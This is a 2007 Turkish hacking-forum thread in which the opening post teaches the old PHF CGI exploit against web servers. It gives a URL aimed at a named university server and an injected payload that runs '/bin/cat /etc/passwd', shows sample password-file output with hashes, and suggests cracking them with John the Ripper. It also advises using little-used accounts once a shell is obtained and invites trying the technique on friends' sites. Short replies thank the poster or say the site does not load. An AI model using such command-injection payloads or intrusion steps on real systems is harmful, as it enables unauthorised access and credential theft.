THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Web Sİtesİ ÇÖkertme AÇiklamali

msn adamı - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2006
Mesajlar:
122
Konular:
42
Teşekkür (Etti):
0
Teşekkür (Aldı):
3
Ticaret:
(0) %
14-01-2007 20:35
#1
Thumbs up
Web Sİtesİ ÇÖkertme AÇiklamali
WEB HACK UZERINE

WEB HACK NEDIR???

WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:

http://www.mo.cs.tutsiki.ac.jp/cgi-b...%20/etc/passwd

Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)

Error 404

/cgi-bin/phf is not found on this server

Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor

Ama asagidaki listeyi verirse bilinki buldunuz))

/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh

asprilla:3A62i9qr.YmO.:1012:10:kafka

CAFER:/home/user/asprilla:/usr/local/bin/tcsh

hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh

necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh

güloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/güloglu:/bin/csh



PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz)) tabi yukardaki satirlari en iyi ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:

root:*:0:1:Operator:/:/bin/csh

www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh

hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh

necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh

güloglu:*:1007:10:kemal GULOGLU:/home/user/güloglu:/bin/csh



Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.


NOT: ARKADAŞLAR FORUMA KOYDUGUM KONULARIN ÇOGU ALINTIDIR HABERİNİZ OLSUN
BU KONU KARTAL137 TARAFINDAN HAZIRLANMIŞTIR
sauron90 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2007
Nereden:
Www.TurkHackTeam.OrG
Mesajlar:
435
Konular:
71
Teşekkür (Etti):
0
Teşekkür (Aldı):
23
Ticaret:
(0) %
01-03-2007 21:21
#2
saolasın bunlrı arşivlemek lazım
--------------------- Pirates Of The Computer

Shadows Of ANGMAR

Boromir&Faramir

Lamer Bu Sitede Yapma Bize Şekil Uçururum Siteni Önümüzden Çekil.........
BETER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2007
Nereden:
MOSCOW
Mesajlar:
72
Konular:
6
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
03-03-2007 17:29
#3
birader siteyi açmıyo
manyaks116 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2009
Mesajlar:
3
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
16-07-2011 09:42
#4
site açılmuıyoo

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler